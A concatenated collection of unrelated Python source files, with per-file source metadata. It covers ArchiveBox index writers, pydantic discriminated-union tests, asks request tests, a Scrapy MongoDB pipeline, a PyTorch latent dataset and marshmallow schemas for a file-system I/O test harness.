def load_links_index(out_dir=OUTPUT_DIR, import_path=None):
"""parse and load existing index with any new links from import_path merged in"""
existing_links = []
if out_dir:
existing_links = parse_json_links_index(out_dir)
check_links_structure(existing_links)
new_links = []
if import_path:
# parse and validate the import file
log_parsing_started(import_path)
raw_links, parser_name = parse_links(import_path)
new_links = validate_links(raw_links)
check_links_structure(new_links)
# merge existing links in out_dir and new links
all_links = validate_links(existing_links + new_links)
check_links_structure(all_links)
num_new_links = len(all_links) - len(existing_links)
if import_path and parser_name:
log_parsing_finished(num_new_links, parser_name)
return all_links, new_links
def write_json_links_index(out_dir, links):
"""write the json link index to a given path"""
check_links_structure(links)
path = os.path.join(out_dir, 'index.json')
index_json = {
'info': 'ArchiveBox Index',
'help': 'https://github.com/pirate/ArchiveBox',
'version': GIT_SHA,
'num_links': len(links),
'updated': str(datetime.now().timestamp()),
'links': links,
}
with open(path, 'w', encoding='utf-8') as f:
json.dump(index_json, f, indent=4, default=str)
chmod_file(path)
def parse_json_links_index(out_dir=OUTPUT_DIR):
"""parse a archive index json file and return the list of links"""
index_path = os.path.join(out_dir, 'index.json')
if os.path.exists(index_path):
with open(index_path, 'r', encoding='utf-8') as f:
links = json.load(f)['links']
check_links_structure(links)
return links
return []
def write_html_links_index(out_dir, links, finished=False):
"""write the html link index to a given path"""
check_links_structure(links)
path = os.path.join(out_dir, 'index.html')
copy_tree(os.path.join(TEMPLATES_DIR, 'static'), os.path.join(out_dir, 'static'))
with open(os.path.join(out_dir, 'robots.txt'), 'w+') as f:
f.write('User-agent: *\nDisallow: /')
with open(os.path.join(TEMPLATES_DIR, 'index.html'), 'r', encoding='utf-8') as f:
index_html = f.read()
with open(os.path.join(TEMPLATES_DIR, 'index_row.html'), 'r', encoding='utf-8') as f:
link_row_html = f.read()
full_links_info = (derived_link_info(link) for link in links)
link_rows = '\n'.join(
Template(link_row_html).substitute(**{
**link,
'title': (
link['title']
or (link['base_url'] if link['is_archived'] else TITLE_LOADING_MSG)
),
'favicon_url': (
os.path.join('archive', link['timestamp'], 'favicon.ico')
# if link['is_archived'] else 'data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs='
),
'archive_url': urlencode(
wget_output_path(link) or 'index.html'
),
})
for link in full_links_info
)
template_vars = {
'num_links': len(links),
'date_updated': datetime.now().strftime('%Y-%m-%d'),
'time_updated': datetime.now().strftime('%Y-%m-%d %H:%M'),
'footer_info': FOOTER_INFO,
'git_sha': GIT_SHA,
'short_git_sha': GIT_SHA[:8],
'rows': link_rows,
'status': 'finished' if finished else 'running',
}
with open(path, 'w', encoding='utf-8') as f:
f.write(Template(index_html).substitute(**template_vars))
chmod_file(path)
def patch_links_index(link, out_dir=OUTPUT_DIR):
"""hack to in-place update one row's info in the generated index html"""
title = link['title'] or latest_output(link)['title']
successful = len(tuple(filter(None, latest_output(link).values())))
# Patch JSON index
changed = False
json_file_links = parse_json_links_index(out_dir)
for saved_link in json_file_links:
if saved_link['url'] == link['url']:
saved_link['title'] = title
saved_link['history'] = link['history']
changed = True
break
if changed:
write_json_links_index(out_dir, json_file_links)
# Patch HTML index
html_path = os.path.join(out_dir, 'index.html')
    with open(html_path, 'r') as f:
        html = f.read().split('\n')
for idx, line in enumerate(html):
if title and ('<span data-title-for="{}"'.format(link['url']) in line):
html[idx] = '<span>{}</span>'.format(title)
elif successful and ('<span data-number-for="{}"'.format(link['url']) in line):
html[idx] = '<span>{}</span>'.format(successful)
break
with open(html_path, 'w') as f:
f.write('\n'.join(html))
### Individual link index
def write_link_index(out_dir, link):
link['updated'] = str(datetime.now().timestamp())
write_json_link_index(out_dir, link)
write_html_link_index(out_dir, link)
def write_json_link_index(out_dir, link):
"""write a json file with some info about the link"""
check_link_structure(link)
path = os.path.join(out_dir, 'index.json')
with open(path, 'w', encoding='utf-8') as f:
json.dump(link, f, indent=4, default=str)
chmod_file(path)
def parse_json_link_index(out_dir):
"""load the json link index from a given directory"""
existing_index = os.path.join(out_dir, 'index.json')
if os.path.exists(existing_index):
with open(existing_index, 'r', encoding='utf-8') as f:
link_json = json.load(f)
check_link_structure(link_json)
return link_json
return {}
def load_json_link_index(out_dir, link):
"""check for an existing link archive in the given directory,
and load+merge it into the given link dict
"""
link = {
**parse_json_link_index(out_dir),
**link,
}
link.update({
'history': link.get('history') or {},
})
check_link_structure(link)
return link
def write_html_link_index(out_dir, link):
check_link_structure(link)
with open(os.path.join(TEMPLATES_DIR, 'link_index.html'), 'r', encoding='utf-8') as f:
link_html = f.read()
path = os.path.join(out_dir, 'index.html')
link = derived_link_info(link)
with open(path, 'w', encoding='utf-8') as f:
f.write(Template(link_html).substitute({
**link,
'title': (
link['title']
or (link['base_url'] if link['is_archived'] else TITLE_LOADING_MSG)
),
'archive_url': urlencode(
wget_output_path(link)
or (link['domain'] if link['is_archived'] else 'about:blank')
),
'extension': link['extension'] or 'html',
'tags': link['tags'].strip() or 'untagged',
'status': 'Archived' if link['is_archived'] else 'Not yet archived',
'status_color': 'success' if link['is_archived'] else 'danger',
}))
chmod_file(path)
```
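The HTML writers above render rows with `string.Template`, which substitutes `$`-prefixed placeholders rather than `{}`-style formatting. A minimal sketch (the placeholder names here are invented, not the real template's):
```python
from string import Template

row_template = Template('<tr><td>$title</td><td>$archive_url</td></tr>')
print(row_template.substitute(
    title='Example page',
    archive_url='archive/1234/index.html',
))
```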
|
{
"source": "JeanArhancet/pydantic",
"score": 2
}
|
#### File: pydantic/tests/test_discrimated_union.py
```python
import re
import sys
from enum import Enum
from typing import Generic, TypeVar, Union
import pytest
from typing_extensions import Annotated, Literal
from pydantic import BaseModel, Field, ValidationError
from pydantic.errors import ConfigError
from pydantic.generics import GenericModel
def test_discriminated_union_only_union():
with pytest.raises(TypeError, match='`discriminator` can only be used with `Union` type'):
class Model(BaseModel):
x: str = Field(..., discriminator='qwe')
def test_discriminated_union_invalid_type():
with pytest.raises(TypeError, match="Type 'str' is not a valid `BaseModel` or `dataclass`"):
class Model(BaseModel):
x: Union[str, int] = Field(..., discriminator='qwe')
def test_discriminated_union_defined_discriminator():
class Cat(BaseModel):
c: str
class Dog(BaseModel):
pet_type: Literal['dog']
d: str
with pytest.raises(ConfigError, match="Model 'Cat' needs a discriminator field for key 'pet_type'"):
class Model(BaseModel):
pet: Union[Cat, Dog] = Field(..., discriminator='pet_type')
number: int
def test_discriminated_union_literal_discriminator():
class Cat(BaseModel):
pet_type: int
c: str
class Dog(BaseModel):
pet_type: Literal['dog']
d: str
with pytest.raises(ConfigError, match="Field 'pet_type' of model 'Cat' needs to be a `Literal`"):
class Model(BaseModel):
pet: Union[Cat, Dog] = Field(..., discriminator='pet_type')
number: int
def test_discriminated_union_root_same_discriminator():
class BlackCat(BaseModel):
pet_type: Literal['blackcat']
class WhiteCat(BaseModel):
pet_type: Literal['whitecat']
class Cat(BaseModel):
__root__: Union[BlackCat, WhiteCat]
class Dog(BaseModel):
pet_type: Literal['dog']
with pytest.raises(ConfigError, match="Field 'pet_type' is not the same for all submodels of 'Cat'"):
class Pet(BaseModel):
__root__: Union[Cat, Dog] = Field(..., discriminator='pet_type')
def test_discriminated_union_validation():
class BlackCat(BaseModel):
pet_type: Literal['cat']
color: Literal['black']
black_infos: str
class WhiteCat(BaseModel):
pet_type: Literal['cat']
color: Literal['white']
white_infos: str
class Cat(BaseModel):
__root__: Annotated[Union[BlackCat, WhiteCat], Field(discriminator='color')]
class Dog(BaseModel):
pet_type: Literal['dog']
d: str
class Lizard(BaseModel):
pet_type: Literal['reptile', 'lizard']
l: str
class Model(BaseModel):
pet: Annotated[Union[Cat, Dog, Lizard], Field(discriminator='pet_type')]
number: int
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_typ': 'cat'}, 'number': 'x'})
assert exc_info.value.errors() == [
{
'loc': ('pet',),
'msg': "Discriminator 'pet_type' is missing in value",
'type': 'value_error.discriminated_union.missing_discriminator',
'ctx': {'discriminator_key': 'pet_type'},
},
{'loc': ('number',), 'msg': 'value is not a valid integer', 'type': 'type_error.integer'},
]
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': 'fish', 'number': 2})
assert exc_info.value.errors() == [
{
'loc': ('pet',),
'msg': "Discriminator 'pet_type' is missing in value",
'type': 'value_error.discriminated_union.missing_discriminator',
'ctx': {'discriminator_key': 'pet_type'},
},
]
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_type': 'fish'}, 'number': 2})
assert exc_info.value.errors() == [
{
'loc': ('pet',),
'msg': (
"No match for discriminator 'pet_type' and value 'fish' "
"(allowed values: 'cat', 'dog', 'reptile', 'lizard')"
),
'type': 'value_error.discriminated_union.invalid_discriminator',
'ctx': {
'discriminator_key': 'pet_type',
'discriminator_value': 'fish',
'allowed_values': "'cat', 'dog', 'reptile', 'lizard'",
},
},
]
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_type': 'lizard'}, 'number': 2})
assert exc_info.value.errors() == [
{'loc': ('pet', 'Lizard', 'l'), 'msg': 'field required', 'type': 'value_error.missing'},
]
m = Model.parse_obj({'pet': {'pet_type': 'lizard', 'l': 'pika'}, 'number': 2})
assert isinstance(m.pet, Lizard)
assert m.dict() == {'pet': {'pet_type': 'lizard', 'l': 'pika'}, 'number': 2}
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_type': 'cat', 'color': 'white'}, 'number': 2})
assert exc_info.value.errors() == [
{
'loc': ('pet', 'Cat', '__root__', 'WhiteCat', 'white_infos'),
'msg': 'field required',
'type': 'value_error.missing',
}
]
m = Model.parse_obj({'pet': {'pet_type': 'cat', 'color': 'white', 'white_infos': 'pika'}, 'number': 2})
assert isinstance(m.pet.__root__, WhiteCat)
def test_discriminated_annotated_union():
class BlackCat(BaseModel):
pet_type: Literal['cat']
color: Literal['black']
black_infos: str
class WhiteCat(BaseModel):
pet_type: Literal['cat']
color: Literal['white']
white_infos: str
Cat = Annotated[Union[BlackCat, WhiteCat], Field(discriminator='color')]
class Dog(BaseModel):
pet_type: Literal['dog']
dog_name: str
Pet = Annotated[Union[Cat, Dog], Field(discriminator='pet_type')]
class Model(BaseModel):
pet: Pet
number: int
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_typ': 'cat'}, 'number': 'x'})
assert exc_info.value.errors() == [
{
'loc': ('pet',),
'msg': "Discriminator 'pet_type' is missing in value",
'type': 'value_error.discriminated_union.missing_discriminator',
'ctx': {'discriminator_key': 'pet_type'},
},
{'loc': ('number',), 'msg': 'value is not a valid integer', 'type': 'type_error.integer'},
]
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_type': 'fish'}, 'number': 2})
assert exc_info.value.errors() == [
{
'loc': ('pet',),
'msg': "No match for discriminator 'pet_type' and value 'fish' " "(allowed values: 'cat', 'dog')",
'type': 'value_error.discriminated_union.invalid_discriminator',
'ctx': {'discriminator_key': 'pet_type', 'discriminator_value': 'fish', 'allowed_values': "'cat', 'dog'"},
},
]
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_type': 'dog'}, 'number': 2})
assert exc_info.value.errors() == [
{'loc': ('pet', 'Dog', 'dog_name'), 'msg': 'field required', 'type': 'value_error.missing'},
]
m = Model.parse_obj({'pet': {'pet_type': 'dog', 'dog_name': 'milou'}, 'number': 2})
assert isinstance(m.pet, Dog)
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_type': 'cat', 'color': 'red'}, 'number': 2})
assert exc_info.value.errors() == [
{
'loc': ('pet', 'Union[BlackCat, WhiteCat]'),
'msg': "No match for discriminator 'color' and value 'red' " "(allowed values: 'black', 'white')",
'type': 'value_error.discriminated_union.invalid_discriminator',
'ctx': {'discriminator_key': 'color', 'discriminator_value': 'red', 'allowed_values': "'black', 'white'"},
}
]
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_type': 'cat', 'color': 'white'}, 'number': 2})
assert exc_info.value.errors() == [
{
'loc': ('pet', 'Union[BlackCat, WhiteCat]', 'WhiteCat', 'white_infos'),
'msg': 'field required',
'type': 'value_error.missing',
}
]
m = Model.parse_obj({'pet': {'pet_type': 'cat', 'color': 'white', 'white_infos': 'pika'}, 'number': 2})
assert isinstance(m.pet, WhiteCat)
def test_discriminated_union_basemodel_instance_value():
class A(BaseModel):
l: Literal['a']
class B(BaseModel):
l: Literal['b']
class Top(BaseModel):
sub: Union[A, B] = Field(..., discriminator='l')
t = Top(sub=A(l='a'))
assert isinstance(t, Top)
def test_discriminated_union_int():
class A(BaseModel):
l: Literal[1]
class B(BaseModel):
l: Literal[2]
class Top(BaseModel):
sub: Union[A, B] = Field(..., discriminator='l')
assert isinstance(Top.parse_obj({'sub': {'l': 2}}).sub, B)
with pytest.raises(ValidationError) as exc_info:
Top.parse_obj({'sub': {'l': 3}})
assert exc_info.value.errors() == [
{
'loc': ('sub',),
'msg': "No match for discriminator 'l' and value 3 (allowed values: 1, 2)",
'type': 'value_error.discriminated_union.invalid_discriminator',
'ctx': {'discriminator_key': 'l', 'discriminator_value': 3, 'allowed_values': '1, 2'},
}
]
def test_discriminated_union_enum():
class EnumValue(Enum):
a = 1
b = 2
class A(BaseModel):
l: Literal[EnumValue.a]
class B(BaseModel):
l: Literal[EnumValue.b]
class Top(BaseModel):
sub: Union[A, B] = Field(..., discriminator='l')
assert isinstance(Top.parse_obj({'sub': {'l': EnumValue.b}}).sub, B)
with pytest.raises(ValidationError) as exc_info:
Top.parse_obj({'sub': {'l': 3}})
assert exc_info.value.errors() == [
{
'loc': ('sub',),
'msg': "No match for discriminator 'l' and value 3 (allowed values: <EnumValue.a: 1>, <EnumValue.b: 2>)",
'type': 'value_error.discriminated_union.invalid_discriminator',
'ctx': {
'discriminator_key': 'l',
'discriminator_value': 3,
'allowed_values': '<EnumValue.a: 1>, <EnumValue.b: 2>',
},
}
]
def test_alias_different():
class Cat(BaseModel):
pet_type: Literal['cat'] = Field(alias='U')
c: str
class Dog(BaseModel):
pet_type: Literal['dog'] = Field(alias='T')
d: str
with pytest.raises(
ConfigError, match=re.escape("Aliases for discriminator 'pet_type' must be the same (got T, U)")
):
class Model(BaseModel):
pet: Union[Cat, Dog] = Field(discriminator='pet_type')
def test_alias_same():
class Cat(BaseModel):
pet_type: Literal['cat'] = Field(alias='typeOfPet')
c: str
class Dog(BaseModel):
pet_type: Literal['dog'] = Field(alias='typeOfPet')
d: str
class Model(BaseModel):
pet: Union[Cat, Dog] = Field(discriminator='pet_type')
assert Model(**{'pet': {'typeOfPet': 'dog', 'd': 'milou'}}).pet.pet_type == 'dog'
def test_nested():
class Cat(BaseModel):
pet_type: Literal['cat']
name: str
class Dog(BaseModel):
pet_type: Literal['dog']
name: str
CommonPet = Annotated[Union[Cat, Dog], Field(discriminator='pet_type')]
class Lizard(BaseModel):
pet_type: Literal['reptile', 'lizard']
name: str
class Model(BaseModel):
pet: Union[CommonPet, Lizard] = Field(..., discriminator='pet_type')
n: int
assert isinstance(Model(**{'pet': {'pet_type': 'dog', 'name': 'Milou'}, 'n': 5}).pet, Dog)
@pytest.mark.skipif(sys.version_info < (3, 7), reason='generics only supported for python 3.7 and above')
def test_generic():
T = TypeVar('T')
class Success(GenericModel, Generic[T]):
type: Literal['Success'] = 'Success'
data: T
class Failure(BaseModel):
type: Literal['Failure'] = 'Failure'
error_message: str
class Container(GenericModel, Generic[T]):
result: Union[Success[T], Failure] = Field(discriminator='type')
with pytest.raises(ValidationError, match="Discriminator 'type' is missing in value"):
Container[str].parse_obj({'result': {}})
with pytest.raises(
ValidationError,
match=re.escape("No match for discriminator 'type' and value 'Other' (allowed values: 'Success', 'Failure')"),
):
Container[str].parse_obj({'result': {'type': 'Other'}})
with pytest.raises(
ValidationError, match=re.escape('Container[str]\nresult -> Success[str] -> data\n field required')
):
Container[str].parse_obj({'result': {'type': 'Success'}})
# coercion is done properly
assert Container[str].parse_obj({'result': {'type': 'Success', 'data': 1}}).result.data == '1'
```
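The pattern these tests exercise, reduced to its smallest form (model names invented):
```python
from typing import Union

from typing_extensions import Literal

from pydantic import BaseModel, Field

class Cat(BaseModel):
    pet_type: Literal['cat']

class Dog(BaseModel):
    pet_type: Literal['dog']

class Owner(BaseModel):
    pet: Union[Cat, Dog] = Field(..., discriminator='pet_type')

# The discriminator routes validation straight to Dog.
print(Owner.parse_obj({'pet': {'pet_type': 'dog'}}).pet)
```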
|
{
"source": "jean/asks",
"score": 2
}
|
#### File: asks/tests/test_request_object.py
```python
import h11
import pytest
from asks.request_object import RequestProcessor
def _catch_response(monkeypatch, headers, data):
req = RequestProcessor(None, 'get', "toot-toot", None)
events = [
h11._events.Response(status_code=200, headers=headers),
h11._events.Data(data=data),
h11._events.EndOfMessage(),
]
async def _recv_event(hconn):
return events.pop(0)
monkeypatch.setattr(req, '_recv_event', _recv_event)
monkeypatch.setattr(req, 'host', 'lol')
cr = req._catch_response(None)
try:
cr.send(None)
except StopIteration as e:
response = e.value
return response
def test_http1_1(monkeypatch):
response = _catch_response(monkeypatch, [('Content-Length', '5')], b'hello')
assert response.body == b'hello'
def test_http1_0(monkeypatch):
response = _catch_response(monkeypatch, [('Connection', 'close')], b'hello')
assert response.body == b'hello'
@pytest.mark.parametrize(['data', 'query_str'], [
[{'foo': 'bar', 'spam': None}, '?foo=bar'],
[{'zero': 0}, '?zero=0'],
[{'empty': ''}, '?empty='],
[{'false': False}, '?false=False'],
])
def test_dict_to_query(data, query_str):
assert RequestProcessor._dict_to_query(data) == query_str
```
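`_catch_response` drives the coroutine by hand: `send(None)` advances it, and the return value surfaces as `StopIteration.value`. The same trick in isolation:
```python
async def answer():
    return 42

coro = answer()
try:
    coro.send(None)  # advance the coroutine; it finishes immediately
except StopIteration as e:
    print(e.value)   # 42
```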
|
{
"source": "jeanazuos/carrier_pigeon",
"score": 2
}
|
#### File: carrier_pigeon/pigeon_news/pipelines.py
```python
import json
from pymongo import MongoClient
import os
from datetime import datetime
import re
class PigeonNewsPipeline:
def mongo_config(self):
self.collection = os.environ.get('MONGO_COLLECTION')
self.uri = os.environ.get('MONGODB_HOSTNAME')
self.database = os.environ.get('MONGODB_DATABASE')
self.port = int(os.environ.get('MONGO_PORT'))
self.user = os.environ.get('MONGODB_USERNAME')
self.password = os.environ.get('MONGODB_PASSWORD')
self.client = MongoClient(
self.uri,
self.port,
username = self.user,
            password = self.password
)
self.db = self.client[self.database]
    # Opens the database connection
def open_spider(self, spider):
self.mongo_config()
    # Closes the database connection
def close_spider(self, spider):
self.client.close()
def process_item(self, item, spider):
# Clean tags
item = cleaner(item)
        # Check whether the title already exists so we don't insert duplicates
if not self.get_one_data("title", item['title']):
self.set_data(item)
else:
            # TODO: implement proper logging
            print("News item already exists")
def set_data(self, item):
        self.db[self.collection].insert_one(dict(item))
    # find_one() returns a single document (or None)
def get_one_data(self, key, value):
return self.db[self.collection].find_one({key: value})
# regex to remove HTML tags and entities such as &lt;, &gt;, &nbsp;
def tags_remover(content):
    cleaner = re.compile(r'<.*?>|(&.+?;)|\s{2,6}')
content = re.sub(cleaner,'',content)
return content
# Parser method
def cleaner(item):
try:
content = {}
if item.get('title'):
title = item.get('title')
content['title'] = tags_remover(title)
if item.get('link'):
link = item.get('link')
content['link'] = tags_remover(link)
if item.get('description'):
description = item.get('description')
content['description'] = tags_remover(description)
if item.get('publication_date'):
publication = item.get('publication_date')
content['publication_date'] = tags_remover(publication)
if item.get('media'):
media = item.get('media')
content['media'] = media
# Add time now to dict
content["processing_date"] = processing_date()
return content
except ValueError:
        # TODO: implement proper logging
        print("Could not find the title tag in the XML")
def processing_date():
now = datetime.now()
today = now.strftime("%d/%m/%Y %H:%M:%S")
return today
```
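A quick check of what the cleaning regex removes in one pass; the sample string is made up:
```python
import re

cleaner = re.compile(r'<.*?>|(&.+?;)|\s{2,6}')
sample = '<p>Breaking&nbsp;news:  rain&hellip; expected</p>'
print(re.sub(cleaner, '', sample))  # -> 'Breakingnews:rain expected'
```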
|
{
"source": "JeanBaptisteGouray/mindgan",
"score": 3
}
|
#### File: mindgan/module_mind/data_loader.py
```python
from torchvision import transforms, datasets
import os
import torch
import pickle as pkl
import numpy as np
class EncodedFFHQ(torch.utils.data.Dataset):
"""Encoded Images dataset."""
def __init__(self, data_path):
self.data_path = data_path
self.liste = os.listdir(data_path)
def __len__(self):
return len(self.liste)
def __getitem__(self, idx):
with open(self.data_path + '/' + self.liste[idx], 'rb') as f:
latent = pkl.load(f)
latent = np.asarray(latent, dtype=np.float32)
return latent
```
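A typical way to consume `EncodedFFHQ`, assuming the class above is importable and the data directory exists; the path and batch size are invented:
```python
import torch

dataset = EncodedFFHQ('data/encoded_ffhq')  # hypothetical directory of pickled latents
loader = torch.utils.data.DataLoader(dataset, batch_size=32, shuffle=True)

for batch in loader:
    # Each batch is a float32 tensor of stacked latent vectors.
    print(batch.shape)
    break
```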
|
{
"source": "JeanBaptisteScanavino/bot_discord_find_game",
"score": 3
}
|
#### File: right/in_memory/games_repository.py
```python
class InMemoryGamesRepository():
def __init__(self):
self.list = ['Mario', 'Sonic', '<NAME>']
def retrieveAll(self):
return self.list
```
|
{
"source": "jeanbez/gekko-fwd",
"score": 2
}
|
#### File: integration/harness/io.py
```python
import ctypes
from marshmallow import Schema, fields, pre_load, post_load
from collections import namedtuple
class DIR_p(fields.Field):
"""Field that deserializes a ::DIR* return value"""
def _deserialize(self, value, attr, data, **kwargs):
return ctypes.c_void_p(value)
class Errno(fields.Field):
"""Field that deserialies an errno return value"""
def _deserialize(self, value, attr, data, **kwargs):
return int(value)
class ByteList(fields.Field):
"""Field that deserializes a list of bytes"""
def _deserialize(self, value, attr, data, **kwargs):
return bytes(value)
class StructTimespecSchema(Schema):
"""Schema that deserializes a struct timespec"""
tv_sec = fields.Integer(required=True)
tv_nsec = fields.Integer(required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('StructTimespec',
['tv_sec', 'tv_nsec'])(**data)
class StructStatSchema(Schema):
"""Schema that deserializes a struct stat"""
st_dev = fields.Integer(required=True)
st_ino = fields.Integer(required=True)
st_mode = fields.Integer(required=True)
st_nlink = fields.Integer(required=True)
st_uid = fields.Integer(required=True)
st_gid = fields.Integer(required=True)
st_rdev = fields.Integer(required=True)
st_size = fields.Integer(required=True)
st_blksize = fields.Integer(required=True)
st_blocks = fields.Integer(required=True)
st_atim = fields.Nested(StructTimespecSchema)
st_mtim = fields.Nested(StructTimespecSchema)
st_ctim = fields.Nested(StructTimespecSchema)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('StructStat',
['st_dev', 'st_ino', 'st_mode', 'st_nlink', 'st_uid',
'st_gid', 'st_rdev', 'st_size', 'st_blksize', 'st_blocks',
'st_atim', 'st_mtim', 'st_ctim'])(**data)
class StructStatxTimestampSchema(Schema):
"""Schema that deserializes a struct timespec"""
tv_sec = fields.Integer(required=True)
tv_nsec = fields.Integer(required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('StructStatxTimestampSchema',
['tv_sec', 'tv_nsec'])(**data)
class StructStatxSchema(Schema):
"""Schema that deserializes a struct stat"""
stx_mask = fields.Integer(required=True)
stx_blksize = fields.Integer(required=True)
stx_attributes = fields.Integer(required=True)
stx_nlink = fields.Integer(required=True)
stx_uid = fields.Integer(required=True)
stx_gid = fields.Integer(required=True)
stx_mode = fields.Integer(required=True)
stx_ino = fields.Integer(required=True)
stx_size = fields.Integer(required=True)
stx_blocks = fields.Integer(required=True)
stx_attributes_mask = fields.Integer(required=True)
stx_atime = fields.Nested(StructStatxTimestampSchema)
stx_btime = fields.Nested(StructStatxTimestampSchema)
stx_ctime = fields.Nested(StructStatxTimestampSchema)
stx_mtime = fields.Nested(StructStatxTimestampSchema)
stx_rdev_major = fields.Integer(required=True)
stx_rdev_minor = fields.Integer(required=True)
stx_dev_major = fields.Integer(required=True)
stx_dev_minor = fields.Integer(required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('StructStatx',
['stx_mask', 'stx_blksize', 'stx_attributes', 'stx_nlink', 'stx_uid',
'stx_gid', 'stx_mode', 'stx_ino', 'stx_size', 'stx_blocks', 'stx_attributes_mask',
'stx_atime', 'stx_btime', 'stx_ctime', 'stx_mtime', 'stx_rdev_major',
'stx_rdev_minor', 'stx_dev_major', 'stx_dev_minor'])(**data)
class DirentStruct(Schema):
"""Schema that deserializes a struct dirent"""
d_ino = fields.Integer(required=True)
d_off = fields.Integer(required=True)
d_reclen = fields.Integer(required=True)
d_type = fields.Integer(required=True)
d_name = fields.Str(required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('DirentStruct',
['d_ino', 'd_off', 'd_reclen', 'd_type', 'd_name'])(**data)
class MkdirOutputSchema(Schema):
"""Schema to deserialize the results of a mkdir() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('MkdirReturn', ['retval', 'errno'])(**data)
class OpenOutputSchema(Schema):
"""Schema to deserialize the results of an open() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('OpenReturn', ['retval', 'errno'])(**data)
class OpendirOutputSchema(Schema):
"""Schema to deserialize the results of an opendir() execution"""
dirp = DIR_p(required=True, allow_none=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('OpendirReturn', ['dirp', 'errno'])(**data)
class ReadOutputSchema(Schema):
"""Schema to deserialize the results of a read() execution"""
buf = ByteList(allow_none=True)
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('ReadReturn', ['buf', 'retval', 'errno'])(**data)
class PreadOutputSchema(Schema):
"""Schema to deserialize the results of a pread() execution"""
buf = ByteList(allow_none=True)
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('PReadReturn', ['buf', 'retval', 'errno'])(**data)
class ReadvOutputSchema(Schema):
"""Schema to deserialize the results of a read() execution"""
buf_0 = ByteList(allow_none=True)
buf_1 = ByteList(allow_none=True)
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('ReadvReturn', ['buf_0', 'buf_1', 'retval', 'errno'])(**data)
class PreadvOutputSchema(Schema):
"""Schema to deserialize the results of a read() execution"""
buf_0 = ByteList(allow_none=True)
buf_1 = ByteList(allow_none=True)
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('PReadvReturn', ['buf_0', 'buf_1', 'retval', 'errno'])(**data)
class ReaddirOutputSchema(Schema):
"""Schema to deserialize the results of a readdir() execution"""
dirents = fields.List(fields.Nested(DirentStruct), allow_none=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('ReaddirReturn', ['dirents', 'errno'])(**data)
class RmdirOutputSchema(Schema):
"""Schema to deserialize the results of an opendir() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('RmdirReturn', ['retval', 'errno'])(**data)
class WriteOutputSchema(Schema):
"""Schema to deserialize the results of a write() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('WriteReturn', ['retval', 'errno'])(**data)
class PwriteOutputSchema(Schema):
"""Schema to deserialize the results of a pwrite() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('PWriteReturn', ['retval', 'errno'])(**data)
class WritevOutputSchema(Schema):
"""Schema to deserialize the results of a writev() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('WritevReturn', ['retval', 'errno'])(**data)
class PwritevOutputSchema(Schema):
"""Schema to deserialize the results of a writev() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('PWritevReturn', ['retval', 'errno'])(**data)
class StatOutputSchema(Schema):
"""Schema to deserialize the results of a stat() execution"""
retval = fields.Integer(required=True)
statbuf = fields.Nested(StructStatSchema, required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('StatReturn', ['retval', 'statbuf', 'errno'])(**data)
class StatxOutputSchema(Schema):
"""Schema to deserialize the results of a stat() execution"""
retval = fields.Integer(required=True)
statbuf = fields.Nested(StructStatxSchema, required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('StatxReturn', ['retval', 'statbuf', 'errno'])(**data)
class LseekOutputSchema(Schema):
"""Schema to deserialize the results of an open() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('LseekReturn', ['retval', 'errno'])(**data)
class IOParser:
OutputSchemas = {
'mkdir' : MkdirOutputSchema(),
'open' : OpenOutputSchema(),
'opendir' : OpendirOutputSchema(),
'read' : ReadOutputSchema(),
'pread' : PreadOutputSchema(),
'readv' : ReadvOutputSchema(),
'preadv' : PreadvOutputSchema(),
'readdir' : ReaddirOutputSchema(),
'rmdir' : RmdirOutputSchema(),
'write' : WriteOutputSchema(),
'pwrite' : PwriteOutputSchema(),
'writev' : WritevOutputSchema(),
'pwritev' : PwritevOutputSchema(),
'stat' : StatOutputSchema(),
